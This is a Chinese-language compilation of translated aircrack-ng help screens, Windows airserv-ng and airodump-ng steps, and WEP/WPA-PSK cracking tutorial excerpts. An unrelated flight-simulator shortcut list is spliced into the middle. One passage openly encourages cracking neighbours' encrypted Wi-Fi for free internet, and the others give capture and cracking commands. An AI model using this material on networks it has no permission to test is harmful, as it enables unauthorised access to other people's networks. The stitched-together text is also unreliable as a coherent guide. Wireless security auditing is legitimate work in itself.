aircrack使用技巧

AirCrack系列中文手册1//--------------------------------------------------------------------2// AirCrack中文手册1.03// 翻译:GaA.Ra(zhoufan#)4// 随意转载,但请保留此部分信息,谢谢5//--------------------------------------------------------------------67/************************************************************8 1.AirCrack-ng9Aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, thus making the attack much faster compared to other WEP cracking tools. In fact, aircrack is a set of tools for auditing wireless networks.10Aircrack 是一个802.11协议WEP和WPA-PSK密钥破解程序,能够恢复出密钥当抓取了足够的数据包的时候.它执行标准FMS攻击并提供一些优化(算法)像Korek攻击,因此相比其他WEP破解工具能够更加快的进行攻击.事实上,Aircrack是一系列的工具用以审计无线网络.11Aircrack-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe12Original work: Christophe Devine131415usage: aircrack-ng [options] <.cap / .ivs file(s)>16使用方法: aircrack-ng [选项] <.cap 或.ivs文件>1718Common options: //命令选项19-a <amode> : force attack mode (1/WEP, 2/WPA-PSK) //设置攻击模式(1是WEP,2是WPA-PSK)20-e <essid> : target selection: network identifier //目标选择:网络标识(如TP-LINK)21-b <bssid> : target selection: access point's MAC //目标选择:AP的MAC地址22-p <nbcpu> : # of CPU to use (default: all CPUs) //使用的CPU(缺省值:全部CPU)23-q : enable quiet mode (no status output) //开启安静模式(不输出状态) 24-C <macs> : merge the given APs to a virtual one //归并给的AP到一个虚拟的25-l <file> : write key to file //把密钥key写入文件2627Static WEP cracking options: //静态WEP破解选项28-c : search alpha-numeric characters only //只搜索字母和数字的字符29-t : search binary coded decimal chr only //只搜索二-十进制的字符30-h : search the numeric key for Fritz!BOX //搜索数字密钥(给Fritz!BOX)31-d <mask> : use masking of the key (A1:XX:CF:YY) //使用密钥掩码,就是用户提供密钥片段32-m <maddr> : MAC address to filter usable packets //MAC地址用以过滤掉无用数据包33-n <nbits> : WEP key length : 64/128/152/256/512 //WEP密钥长度:64/128/152/256/51234-i <index> : WEP key index (1 to 4), default: any //WEP密钥索引(1至4),缺省值:任何35-f <fudge> : bruteforce fudge factor, default: 2 //穷举猜测因子,缺省值:236-k <korek> : disable one attack method (1 to 17) //取消Korek的某一种攻击方法(1到17)37-x or -x0 : disable bruteforce for last keybytes //取消最后一个密钥字节的穷举38-x1 : last keybyte bruteforcing (default) //最后一个密钥字节进行穷举(缺省)39-x2 : enable last 2 keybytes bruteforcing //设置最后两个密钥字节进行穷举40-y : experimental single bruteforce mode //实验性的单一穷举模式41-K : use only old KoreK attacks (pre-PTW) //只是用旧KoreK攻击(Pre-PTW方式)42-s : show the key in ASCII while cracking //破解时显示密钥的ASCII 值43-M <num> : specify maximum number of IVs to use //指定最大使用的IVs(初始向量)44-D : WEP decloak, skips broken keystreams //WEP伪装,跳过坏掉的密钥流45-P <num> : PTW debug: 1: disable Klein, 2: PTW //PTW排错:1:取消Klein(方式),2:PTW46-1 : run only 1 try to crack key with PTW //只运行一次尝试用PTW破解密钥4748WEP and WPA-PSK cracking options: //WEP和WPA-PSK破解选项49-w <words> : path to wordlist(s) filename(s) //字典文件路径50-r <DB> : path to airolib-ng database //airolib-ng数据库路径,不能和-w选项同时用51(Cannot be used with -w)5253--help : Displays this usage screen //显示这个帮助界面5455 2.Airdecap-ng56decrypts WEP/WPA capture files. Part of the aircrack suite.57解密抓到的WEP/WPA数据包,是AirCrack(工具)组的一部分. //将数据包解密后可以看到明文,查找关键信息58Airdecap-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe59Original work: Christophe Devine606162usage: airdecap-ng [options] <pcap file>63使用方法: airdecap-ng [选项] <pcap文件>6465Common options: //命令选项66-l : don't remove the 802.11 header //不要去除802.11头部67-b <bssid> : access point MAC address filter //AP的MAC地址用以过滤68-e <essid> : target network SSID //目标网络SSID(如TP-LINK)6970WEP specific option: //WEP特殊选项71-w <key> : target network WEP key in hex //目标网络十六进制WEP密钥7273WPA specific options: //WPA特殊选项74-p <pass> : target network WPA passphrase //目标网络WPA密码75-k <pmk> : WPA Pairwise Master Key in hex //WPA十六进制成对主密钥(PMK)7677--help : Displays this usage screen //显示这个帮助界面7879 3.Aireplay-ng80802.11 packet injection program. Part of the aircrack suite.81802.11数据包注入程序.是AirCrack(工具)组的一部分.82Aireplay-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe83Original work: Christophe Devine848586usage: aireplay-ng <options> <replay interface>87使用方法: aireplay-ng <选项> <重放攻击接口>8889Filter options: //过滤器选项90-b bssid : MAC address, Access Point //AP的MAC地址91-d dmac : MAC address, Destination //目标MAC地址92-s smac : MAC address, Source //源MAC地址93-m len : minimum packet length //数据包最小长度94-n len : maximum packet length //数据包最大长度95-u type : frame control, type field //帧控制,type域96-v subt : frame control, subtype field //帧控制,subtype域97-t tods : frame control, To DS bit //帧控制,ToDS位98-f fromds : frame control, From DS bit //帧控制,FromDS位99-w iswep : frame control, WEP bit //帧控制,WEP位100-D : disable AP detection //取消AP探测101102Replay options: //重放攻击选项103-x nbpps : number of packets per second //每秒发送数据包数104-p fctrl : set frame control word (hex) //设置帧控制字(十六进制)105-a bssid : set Access Point MAC address //设置AP的MAC地址106-c dmac : set Destination MAC address //设置目标MAC地址107-h smac : set Source MAC address //设置源目标MAC地址108-g value : change ring buffer size (default: 8) //改变环形缓冲区大小(缺省值:8)109-F : choose first matching packet //选择第一个匹配的数据包110111Fakeauth attack options: //伪连接攻击选项112-e essid : set target AP SSID //设置目标AP的SSID(如TP-LINK)113-o npckts : number of packets per burst (0=auto, default: 1) //每组数据包数(0为自动,缺省值:1)114-q sec : seconds between keep-alives //发送keep-alives包的间隔时间115-y prga : keystream for shared key auth //共享密钥认证的密钥流116-T n : exit after retry fake auth request n time //当重复尝试n次伪连接失败后退出117118Arp Replay attack options: //Arp重放攻击选项119-j : inject From DS packets //从DS数据包注入120121Fragmentation attack options: //碎片攻击选项122-k IP : set destination IP in fragments //设置碎片里的目标IP123-l IP : set source IP in fragments //设置碎片里的源IP124125Test attack options: //测试攻击选项126-B : activates the bitrate test //激活比特率(码率)测试127128Source options: //源选项129-i iface : capture packets from this interface //从指定接口里抓取数据包130-r file : extract packets from this pcap file //从指定pcap文件里提取数据包131132Miscellaneous options: //其他选项133-R : disable /dev/rtc usage //取消/dev/rtc的使用134135Attack modes (numbers can still be used): //攻击模式(数字仍然可以使用)136--deauth count : deauthenticate 1 or all stations (-0) //解除一个或者全部站的连接137--fakeauth delay : fake authentication with AP (-1) //对AP进行伪连接攻击138--interactive : interactive frame selection (-2) //交互注入攻击139--arpreplay : standard ARP-request replay (-3) //标准Arp请求包重放攻击140--chopchop : decrypt/chopchop WEP packet (-4) //解码或断续WEP数据包攻击141--fragment : generates valid keystream (-5) //产生合法密钥流142--caffe-latte : query a client for new IVs (-6) //向一个客户端查询新IV(初始向量)143--cfrag : fragments against a client (-7) //对一个客户端的片段144--test : tests injection and quality (-9) //测试注入和质量145146--help : Displays this usage screen //显示这个帮助界面1471484.Airmon-ng149 a utility to check an wifi interfaces status and placing the interface into monitor mode. Part of the aircrack suite.150一个用来检查wifi接口状态和更改接口进入监控模式的工具.是AirCrack(工具)组的一部分.151usage: airmon-ng <start|stop|check> <interface> [channel or frequency]152使用方法: airmon-ng <start或stop或check> <接口> [信道或频率]1531545.Airodump-ng155802.11 packet capture program. Part of the aircrack suite.156802.11数据包抓包程序.是AirCrack(工具)组的一部分.157Airodump-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe158Original work: Christophe Devine159160161usage: airodump-ng <options> <interface>[,<interface>,...]162使用方法: airodump-ng <选项> <接口>[,<接口>,...]163164Options: //选项165--ivs : Save only captured IVs //只保存初始向量数据包166--gpsd : Use GPSd //使用GPSd167--write <prefix> : Dump file prefix //转储文件名前缀168-w : same as --write //和--write相同169--beacons : Record all beacons in dump file //在转储文件里记录所有信标170--update <secs> : Display update delay in seconds //显示校正延迟时间171--showack : Prints ack/cts/rts statistics //显示ack,cts,rts统计172-h : Hides known stations for --showack //对--showack命令隐藏已知站点173-f <msecs> : Time in ms between hopping channels //跳跃信道的时间,毫秒表示174--berlin <secs> : Time before removing the AP/client //从屏幕移除AP 或客户端的时间175from the screen when no more packets//当没有收到更多数据包的时候176are received (Default: 120 seconds) //缺省值是120秒177-r <file> : Read packets from that file //从指定文件中读取数据包178-x <msecs> : Active Scanning Simulation //模拟主动扫描179--output-format180<formats> : Output format. Possible values: //输出格式.可能的取值:如下行181pcap, ivs, csv, gps, kismet, netxml182183Filter options: //过滤器选项184--encrypt <suite> : Filter APs by cipher suite //通过加密方式过滤AP185--netmask <netmask> : Filter APs by mask //通过掩码过滤AP186--bssid <bssid> : Filter APs by BSSID //通过BSSID 过滤AP187-a : Filter unassociated clients //过滤无客户端连接188189By default, airodump-ng hop on 2.4Ghz channels. //通常airodump-ng在2.4Ghz的信道上跃变190You can make it capture on other/specific channel(s) by using://你可以让它抓取其他(特定)信道191--channel <channels>: Capture on specific channels //抓取指定信道192--band <abg> : Band on which airodump-ng should hop//airodump-ng跃变的频带193-C <frequencies> : Uses these frequencies in MHz to hop//使用这些频率(单位MHz)跃变194--cswitch <method> : Set channel switching method //设置信道转换的方法1950 : FIFO (default) //先进先出(缺省)196 1 : Round Robin //循环197 2 : Hop on last //最后一次跃变198-s : same as --cswitch //功能如--cswitch199200--help : Displays this usage screen //显示这个帮助界面2012026.Packetforge-ng203BackTrack工具列表中没有工具说明,这是一个伪造数据包的工具204Packetforge-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe205Original work: Christophe Devine and Martin Beck206207208Usage: packetforge-ng <mode> <options>209使用方法: packetforge-ng <模式> <选项>210211Forge options: //伪造选项212-p <fctrl> : set frame control word (hex) //设置帧控制字(十六进制) 213-a <bssid> : set Access Point MAC address //设置AP的MAC地址214-c <dmac> : set Destination MAC address //设置目标MAC地址215-h <smac> : set Source MAC address //设置源MAC地址216-j : set FromDS bit //设置FromDS位217-o : clear ToDS bit //设置ToDS位218-e : disables WEP encryption //取消WEP加密219-k <ip[:port]> : set Destination IP [Port] //设置目标IP[端口]220-l <ip[:port]> : set Source IP [Port] //设置源IP[端口]221-t ttl : set Time To Live //设置存活时间222-w <file> : write packet to this pcap file //将数据包写入指定pcap文件223-s <size> : specify size of null packet //指定空数据包的大小224-n <packets> : set number of packets to generate//设置要产生的数据包数目225226Source options: //源选项227-r <file> : read packet from this raw file //从指定原始文件读取数据包228-y <file> : read PRGA from this file //从指定文件读取PRGA(WEP加密中间量)229230Modes: //模式231--arp : forge an ARP packet (-0) //伪造ARP数据包232--udp : forge an UDP packet (-1) //伪造UDP数据包233--icmp : forge an ICMP packet (-2) //伪造ICMP数据包234--null : build a null packet (-3) //建一个空的数据包235--custom : build a custom packet (-9) //建一个自定义数据包236237--help : Displays this usage screen //显示这个帮助界面2382397.Airolib-ng240BackTrack工具列表中没有工具说明,这是进行WPA Rainbow Table攻击时使用,用于建立特定数据库文件.(by 杨哲)241Airolib-ng 1.0 r1645 - (C) 2007, 2008, 2009 ebfe242243244Usage: airolib-ng <database> <operation> [options]245使用方法: airolib-ng <数据库> <操作> [选项]246247Operations: //操作248--stats : Output information about the database. //输出数据库信息249--sql <sql> : Execute specified SQL statement. //执行指定的SQL语句250--clean [all] : Clean the database from old junk. 'all' will also //从数据库清理旧的无用数据.'all'选项251reduce filesize if possible and run an integrity check. //将会减少文件大小如果可以,同时对数据252//库进行一次完整性校验253--batch : Start batch-processing all combinations of ESSIDs //开始批处理所有ESSID和密码的组合254and passwords.255--verify [all] : Verify a set of randomly chosen PMKs. //验证一组随机选择的PMK256If 'all' is given, all invalid PMK will be deleted. //'all'选项会使所有不合法的PMK被删除257--import [essid|passwd] <file> :258Import a text file as a list of ESSIDs or passwords. //导入文件文件作为ESSID或者密码清单259--import cowpatty <file> :260Import a cowpatty file. //导入一个cowpatty文件261--export cowpatty <essid> <file> :262Export to a cowpatty file. //导出一个cowpatty文件2632648.Airbase-ng265Airbase is a SoftAP acting much like karma it will respond to any request probe allowing may client side attacks to be preformed. This works by using monitor mode and injection allowing a simulated master mode.266Airbase是一个软件(模拟)AP像karma(一个工具,bt4里有),它能够响应任何请求探查允许可能的客户端攻击能够成型.这个需要使用监控模式和一个允许注入的模拟主模式.267Airbase-ng 1.0 r1645 - (C) 2008, 2009 Thomas d'Otreppe268Original work: Martin Beck269270271usage: airbase-ng <options> <replay interface>272使用方式: airbase-ng <选项> <重放攻击接口>273274Options: //选项275-a bssid : set Access Point MAC address //设置AP的MAC地址276-i iface : capture packets from this interface //从指定接口抓取数据包277-w WEP key : use this WEP key to en-/decrypt packets //使用指定WEP密钥进行加密/解密数据包278-h MAC : source mac for MITM mode //MITM模式使用的源MAC地址279-f disallow : disallow specified client MACs (default: allow) //不允许指定客户端MAC地址(缺省:允许)280-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto) //[不要]设置WEP标志在信标0|1(缺省:自动)281-q : quiet (do not print statistics) //安静模式(不要打印统计信息)282-v : verbose (print more messages) //冗长模式(打印更多信息)283-A : Ad-Hoc Mode (allows other clients to peer) //Ad-Hoc模式(允许其他客户端处于同等级)284-Y in|out|both : external packet processing //外部数据包处理285-c channel : sets the channel the AP is running on //设置AP运行在的信道286-X : hidden ESSID //隐藏ESSID287-s : force shared key authentication (default: auto) //强制使用共享密钥验证(缺省:自动)288-S : set shared key challenge length (default: 128) //设置共享密钥挑战长度(缺省:128)289-L : Caffe-Latte WEP attack (use if driver can't send frags)//Caffe-LatteWEP攻击(当不能发送碎片时)290-N : cfrag WEP attack (recommended) //cfragWEP攻击(推荐)291-x nbpps : number of packets per second (default: 100) //每秒发送数据包个数(缺省:100)292-y : disables responses to broadcast probes //取消对广播探查的响应293-0 : set all WPA,WEP,open tags. can't be used with -z & -Z //设置所有WPA,WEP,OPN标记,不能与-z同时用294-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104 //设置WPA1标记.295-Z type : same as -z, but for WPA2 //与-z一样,但是用于WPA2296-V type : fake EAPOL 1=MD5 2=SHA1 3=auto //伪装EAPOL(局域网扩展验证协议)297-F prefix : write all sent and received frames into pcap file //将所有发送和接受的帧写入pcap文件298-P : respond to all probes, even when specifying ESSIDs //响应所有探查,即使指定了ESSID299-I interval : sets the beacon interval value in ms //设置信标时间间隔,单位毫秒300-C seconds : enables beaconing of probed ESSID values (requires -P) //允许探查信标的ESSID值(要求-P参数)301302Filter options: //过滤器选项303--bssid MAC : BSSID to filter/use //过滤/使用的BSSID304--bssids file : read a list of BSSIDs out of that file //从指定文件读取BSSID的清单305--client MAC : MAC of client to filter //客户端的MAC地址用以过滤306--clients file : read a list of MACs out of that file //从指定文件读取客户端MAC地址清单307--essid ESSID : specify a single ESSID (default: default) //指定一个ESSID(缺省值:default)308--essids file : read a list of ESSIDs out of that file //从指定文件读取指定的ESSID清单309310--help : Displays this usage screen //显示这个帮助界面3113129.Airdecloak-ng313BackTrack工具列表中没有工具说明.314Airdecloak-ng 1.0 r1645 - (C) 2008, 2009 Thomas d'Otreppe315316317usage: airdecloak-ng [options]318使用方法: airdecloak-ng [选项]319320options: //选项321Mandatory: //强制的322-i <file> : Input capture file //输入数据包文件323--ssid <ESSID> : ESSID of the network to filter //用以过滤的网络ESSID324or//或325--bssid <BSSID> : BSSID of the network to filter //用以过滤的网络BSSID326327Optional: //可选择的328--filters <filters> : Apply filters (separated by a comma). Filters: //应用过滤器(用逗号分开)329signal: Try to filter based on signal. //基于信号尝试过滤330duplicate_sn: Remove all duplicate sequence numbers //移除所有AP和客户端的重复顺序号331for both the AP and the client.332duplicate_sn_ap: Remove duplicate sequence number for //移除AP的重复顺序号333the AP only.334duplicate_sn_client: Remove duplicate sequence number for the //移除客户端的重复顺序号335client only.336consecutive_sn: Filter based on the fact that IV should //基于IV必须连续事实的过滤器(只用于AP)337be consecutive (only for AP).338duplicate_iv: Remove all duplicate IV. //移除所有重复的IV339signal_dup_consec_sn: Use signal (if available), duplicate and //使用信号(如果可用),重复和连续的顺序号340consecutive sequence number (filtering is //筛选将会比一个一个使用过滤器更加精确341much more precise than using all these342filters one by one).343--null-packets : Assume that null packets can be cloaked. //假设空数据包能够伪装344--disable-base_filter : Do not apply base filter. //不要应用基准过滤器345--drop-frag : Drop fragmented packets //丢弃碎片数据包346347--help : Displays this usage screen //显示这个帮助界面34834910.Airtun-ng350BackTrack工具列表中没有工具说明.351Airtun-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe352Original work: Christophe Devine and Martin Beck353354355usage: airtun-ng <options> <replay interface>356使用方法: airtun-ng <选项> <重放攻击接口>357358-x nbpps : number of packets per second (default: 100) //每秒发送数据包数目(缺省:100)359-a bssid : set Access Point MAC address //设置AP的MAC地址360-i iface : capture packets from this interface //从指定接口抓取数据包361-y file : read PRGA from this file //从指定文件读取PRGA(WEP加密中间量)362-w wepkey : use this WEP-KEY to encrypt packets //使用指定的WEP密钥加密数据包363-t tods : send frames to AP (1) or to client (0) //发送帧到AP或者客户端364-r file : read frames out of pcap file //从指定pcap文件读取帧365366Repeater options: //转发器选项367--repeat : activates repeat mode //激活重复模式368--bssid <mac> : BSSID to repeat //用以重复的BSSID369--netmask <mask> : netmask for BSSID filter //网络掩码用以进行BSSID过滤370371--help : Displays this usage screen //显示这个帮助界面37237311.Easside-ng374BackTrack工具列表中没有工具说明.375Easside-ng 1.0 r1645 - (C) 2007, 2008, 2009 Andrea Bittau376377378Usage: easside-ng <options>379使用方法: easside-ng <选项>380381Options:382-h : This help screen //显示这个帮助界面383-v <victim mac> : Victim BSSID //攻击的BSSID384-m <src mac> : Source MAC address //源MAC地址385-i <ip> : Source IP address //源IP地址386-r <router ip> : Router IP address //路由器IP地址387-s <buddy ip> : Buddy-ng IP address (mandatory) //Buddy-ng的IP地址(必须的)388-f <iface> : Interface to use (mandatory) //使用的接口(必须的)389-c <channel> : Lock card to this channel //锁定网卡到指定信道390-n : Determine Internet IP only //只确定因特网IP391************************************************************/。

由于在Windows环境下不能如Linux环境般直接调用无线网卡，所以需要使用其他工具将无线网卡载入，以便攻击工具能够正常使用。

在无线攻击套装Aircrack-ng的Windows版本下内置了这样的工具，就是airserv-ng。

步骤1：打开CMD，通过cd命令进入到aircrack-ng for Windows版本所在目录，输入airserv-ng，可以看到如图5-29所示的内容。

图5-29 在CMD下运行airserv-ng参数解释：* -p，指定监听的端口，即提供连接服务的端口，默认为666；* -d，载入无线网卡设备，需要驱动支持；* -c，指定启动工作频道，一般设置为预攻击AP的工作频道，默认为1；* -v，调试级别设定。

作为Windows下的破解，第一步就是使用airserv-ng来载入我们当前使用的无线网卡，为后续破解做准备，命令如下（注意：在命令中出现的引号一律使用英文下的引号输入）：airserv-ng -d "|debug"或者airserv-ng -d "| {my adapter id}"输入完成后airserv-ng会自动搜寻现有无线网卡，会有提示，选择正确的无线网卡直接输入y，此时airserv-ng就在正常载入驱动后，同时开始监听本地的666端口。

换句话说，airserv-ng提供的是该无线网卡的网络服务，其他计算机上的用户也可以连接到这个端口来使用这块网卡，如图5-30所示。

图5-30 airserv-ng工作中步骤2：现在可以使用airodump-ng来搜索当前无线环境了。

注意，要另开启一个CMD，再输入如下命令：airodump-ng ：666这里在IP地址处输入为本机即，端口采用的是默认的666。

图5-31 在CMD下运行airodump-ng如图5-31所示，当确定预攻击目标AP的频道后，使用组合键Ctrl + C中断，即可使用如下参数来精确定位目标：airodump-ng --channel number -w filename这里输入“airodump-ng --channel 7 -w onewpa ，回车后可看到如图5-32所示的内容。

完全教程Aircrack其实关于无线基础知识的内容还是挺多的，但是由于本书侧重于BT4自身工具使用的讲解，若是再仔细讲述这些外围的知识，这就好比讲述DNS工具时还要把DNS服务器的类型、工作原理及配置讲述一遍一样，哈哈，估计整本书的厚度就需要再翻一、两倍了。

恩，关于无线网络基础知识建议大家可以参考我之前在黑手这里出版的《无线黑客傻瓜书》一书，会很有帮助。

恩，先说明一下，本章的内容适用于目前市面所有主流品牌无线路由器或AP如Linksys、Dlink、TPLink、BelKin等。

涉及内容包括了WEP加密及WPA-PSK加密的无线网络的破解操作实战。

◆什么是Aircrack-ngAircrack-ng是一款用于破解无线802.11WEP及WPA-PSK加密的工具，该工具在2005年11月之前名字是Aircrack，在其2.41版本之后才改名为Aircrack-ng。

Aircrack-ng主要使用了两种攻击方式进行WEP破解：一种是FMS攻击，该攻击方式是以发现该WEP漏洞的研究人员名字（Scott Fluhrer、Itsik Mantin及Adi Shamir）所命名；另一种是KoreK攻击，经统计，该攻击方式的攻击效率要远高于FMS攻击。

当然，最新的版本又集成了更多种类型的攻击方式。

对于无线黑客而言，Aircrack-ng是一款必不可缺的无线攻击工具，可以说很大一部分无线攻击都依赖于它来完成；而对于无线安全人员而言，Aircrack-ng也是一款必备的无线安全检测工具，它可以帮助管理员进行无线网络密码的脆弱性检查及了解无线网络信号的分布情况，非常适合对企业进行无线安全审计时使用。

Aircrack-ng（注意大小写）是一个包含了多款工具的无线攻击审计套装，这里面很多工具在后面的内容中都会用到，具体见下表1为Aircrack-ng包含的组件具体列表。

表1Aircrack-ng在BackTrack4 R2下已经内置（下载BackTrack4 R2），具体调用方法如下图2所示：通过依次选择菜单中“Backtrack”—“Radio Network Analysis” —“80211”—“Cracking”—“Aircrack-ng ”，即可打开Aircrack-ng的主程序界面。

微软模拟飞行-飞行手册模拟器命令暂停 P或者Break全屏模式 ALT +Enter显示菜单或者隐藏 ALT显示或者隐藏 ATC菜单?ACCENT 或者SCROLL LOCK 显示或者隐藏膝板(Kneeboard) Shift + F10声音开关 Q重置当前飞行 CTRL + ;（分号）保存飞行 ; （分号）退出飞行模拟 CTRL+ C立即退出飞行模拟 CTRL + Break摇杆（禁用/使用） CTRL + K全球坐标/帧频 Shift + Z选择第一个 1选择第二个 2选择第三个 3选择第四个 4选择时间压缩 R空投物资 SHIFT + D请求加油车 SHIFT + F显示或者隐藏航空器标签 CTRL + SHIFT + L显示或者隐藏飞行技巧 CTRL + SHIFT + X增大选择 =缓慢增大选择 SHIFT + =缓慢减小选择 SHIFT+ -减小选择 -捕获截图 V移动廊桥(jet ways) CTRL + J飞机控制面命令副翼左倾斜数字键盘 4副翼右倾斜数字键盘 6副翼左配平 CTRL + 数字键盘 4副翼右配平 CTRL + 数字键盘 6垂直尾翼右偏航数字键盘 Enter垂直尾翼左偏航数字键盘 0垂直尾翼右配平 CTRL+ 数字键盘Enter垂直尾翼左配平 CTRL + 数字键盘 0副翼或垂直尾翼居中数字键盘 5水平升降舵向下数字键盘8水平升降舵向上数字键盘 2升降舵向下配平数字键盘7升降舵向上配平数字键盘1襟翼完全收起 F5襟翼缓慢收起 F6襟翼缓慢伸出 F7襟翼完全伸出 F8伸出/收起扰流板 /预位扰流板 SHIFT + /发动机控制命令选择引擎 E+引擎编号选择所有引擎 E+1+2+3+4切断节流阀 F1 (节流阀就是油门)反冲力(涡扇发动机/喷气发动机) F2按住且保持降低节流阀 F2增加节流阀 F3节流阀最大 F4螺旋桨低转速 CTRL + F1螺旋桨增加转速 CTRL + F3螺旋桨高转速 CTRL + F4油气混合空闲切断 CTRL+ SHIFT +F1油气混合快速贫油 CTRL+ SHIFT +F2油气混合富油 CTRL+ SHIFT +F3油气混合完全富油 CTRL+ SHIFT +F4磁电机选择 M主用电池组或者交流发电机 SHIFT+M喷气发动机启动钮 J直升机旋翼离合器开关 SHIFT+ .(句点)直升机旋翼调节器开关 SHIFT+,(逗号)直升机旋翼刹车开关 SHIFT+B增加选择(比如放大视角) =(等于号)缓慢增加选择 SHIFT+ =缓慢减小选择 SHIFT + -减小选择 -通用航空飞机控制命令刹车（设置停放时）CTRL +. 控制尾轮左右转弯 SHIFT+P ,然后1和2刹车开关 .（句点）左刹车数字键盘 +右刹车数字键盘 -收放起落架 G尾轮锁定开关 SHIFT+G手动模式放下起落架 CTRL+ G子面板显示或隐藏 SHIFT + (1到9)烟雾系统开关 |引擎罩襟翼缓慢打开 CTRL+ SHIFT + V引擎罩音译缓慢关闭 CTRL+ SHIFT + C请求牵引飞机 CTRL+ SHIFT + Y释放牵引绳索 SHIFT + Y灯光命令全部灯开关 L频闪灯开关 O面板灯开关 SHIFT +L降落灯开关 CTRL +L降落灯偏向左 CTRL+ SHIFT + 数字键盘4 降落灯偏向右 CTRL+ SHIFT + 数字键盘6 降落灯偏向上 CTRL+ SHIFT + 数字键盘8 降落灯偏居中 CTRL+ SHIFT + 数字键盘5 无线电控制命令VOR 1开关 CTRL+1 VOR 2 开关 CTRL +2MKR 开关 CTRL + 3DME 开关 CTRL + 4ADF 开关 CTRL+ 5备用频率 XNAV无线电选择 NOBS指示器选择 SHIFT +VADF 选择 CTRL+ SHIFT +ADME 选择 F雷达收发器选择 T自动驾驶命令主开关 Z飞行导向开关 CTRL +F偏航阻尼器开关CTRL+D高度保持开关 CTRL +Z高度旋钮选择 CTRL +SHIFT+Z航向保持开关 CTRL + H航向旋钮选择CTRL+ SHIFT +H空速保持开关 CTRL + R马赫数保持开关 CTR+M自动油门 SHIFT+R自动油门啮合(TOGA) CTRL+SHIFT +G NAV1保持开关 CTRL +N近进模式开关 CTRL +A反向进近(BC)模式开关 CTRL +B定位信标保持开关 CTRL +O姿态保持开关 CTRL +T仪表命令航向指示仪复位 D高度计复位 B皮托管加热开关 SHIFT +H视角控制命令平面驾驶舱 W对齐面板视角(Snap to Panel View) SHIFT + 数字键盘0 查看下一个 S查看上一个 SHIFT +S查看分类中的下一视角 A查看分类中的上一视角 SHIFT +A查看前一视角链接(toggle) CTRL +S查看(默认缩放比例) 退格键 BACKSPACE关闭选择的窗口 ]虚拟驾驶舱 F92D驾驶舱 F10侧面视角 F11俯视角 F12窗口(选择窗口在上层) ‘放大 =缩小 -下一窗口 CTRL + TAB上一窗口 CTRL + SHIFT + TAB任务命令罗盘/指针开关 U罗盘目标下一个 K罗盘目标上一个 SHIFT +K多人玩控制聊天窗口显示或者隐藏 CTRL + SHIFT+J聊天窗口（激活）ENTER转交/接收控制 SHIFT＋T跟随其他玩家 CTRL + SHIFT + F启动传输语音 CAPS LOCK停止传输语音 ^ CAPS LOCK启动传输语音到所有玩家 SHIFT + CAPS LOCK停止传输语音到所有玩家 ^SHIFT + CPAS LOCKSLEW(回转)模式控制键回转模拟开关 Y航向向北/高度层 CTRL + 空格键冻结所有运动数字键盘5冻结所有垂直运动 F2左旋转数字键盘1左倾斜数字键盘7右倾斜数字键盘9抬头 9快速抬头 F5低头 F7或者0快速低头 F8注：本命令还不完整和需要修订，请评论。

【IT168专稿】上期为各位介绍了将自己的网卡重新安装驱动，以便使用无线网络检测及WEP解密工具。

当我们把网卡驱动更新完毕后，我们再来看看如何找出已经禁用了SSID号广播的无线网络以及进行WEP解密工作。

安全危机轻松破解无线网络WEP密码上篇一、使用airodump抓取无线网络数据包并破解SSID名称：不管是找出已经禁用了SSID号广播的无线网络还是进行WEP解密工作，我们首先要做的就是通过无线网络sniffer工具——airodump来监视无线网络中的数据包。

第一步：打开文章中下载的winaircrackpack压缩包解压缩的目录。

（点击看大图）第二步：运行airodump.exe程序，这个就是我们的sniffer小工具，他的正常运行是建立在我们无线网卡已经更新驱动的基础上。

第三步：这时你会发现显示的信息和安装驱动前已经不同了，我们的TP-LINK网卡名称已经变为13atheros ar5005g cardbus wireless network adapter，也就是说他成功更新为与atheros兼容的硬件了。

我们输入其前面的数字13即可。

（点击看大图）第四步：接下来是选择无线网卡的类型，既然说了是与atheros相兼容的，所以直接输入“a”进行选择即可。

（点击看大图）第五步：上篇文章中提到了笔者已经把无线网络的SSID广播功能取消了，这样我们假设还不知道该无线设备使用的哪个频段和SSID号。

在这里输入0，这样将检测所有频段的无线数据包。

（点击看大图）小提示：实际上要想知道一个无线网络使用的频段是非常简单的，可以使用无线网卡管理配置工具，就像上文提到的那样，可以知道该无线网络使用的速度和频段，但是无法检测出SSID号来。

第六步：同样输入一个保存数据包信息的文件，例如笔者输入softer。

这样可以把检测到的数据包以及统计信息一起写到这个文件中，并为使用其他工具提供基础保证。

（点击看大图）第七步：是否只收集wep数据信息，我们点N”。

随着社会的进步！WIFI上网日益普及,特别是大城市中随便在一个小区搜索一下就能找到好多热点,搜索到热点然后链接上去那么我们就可以尽情的享受免费上网服务了。

不过除了公共场所以及菜鸟用户之外几乎所有的WIFI信号都是加密的,很简单换作是你你也不愿意把自己的带宽免费拿出来给别人用,所以如果你搜索到你附近有热点想免费上网的话请仔细往下学习...破解静态WEP KEY全过程首先通过NetStumbler确认客户端已在某AP的覆盖区内，并通过AP信号的参数进行‘踩点’（数据搜集）。

通过上图的红色框框部分内容确定该SSID名为demonalex的AP为802.11b类型设备，Encryption 属性为‘已加密’，根据802.11b所支持的算法标准，该算法确定为WEP。

有一点需要注意：NetStumbler 对任何有使用加密算法的STA[802.11无线站点]都会在Encryption属性上标识为WEP算法，如上图中SSID为gzpia的AP使用的加密算法是WPA2-AES。

我们本次实验的目的是通过捕捉适当的数据帧进行IV（初始化向量）暴力破解得到WEP KEY，因此只需要使用airodump.exe（捕捉数据帧用）与WinAircrack.exe（破解WEP KEY用）两个程序就可以了。

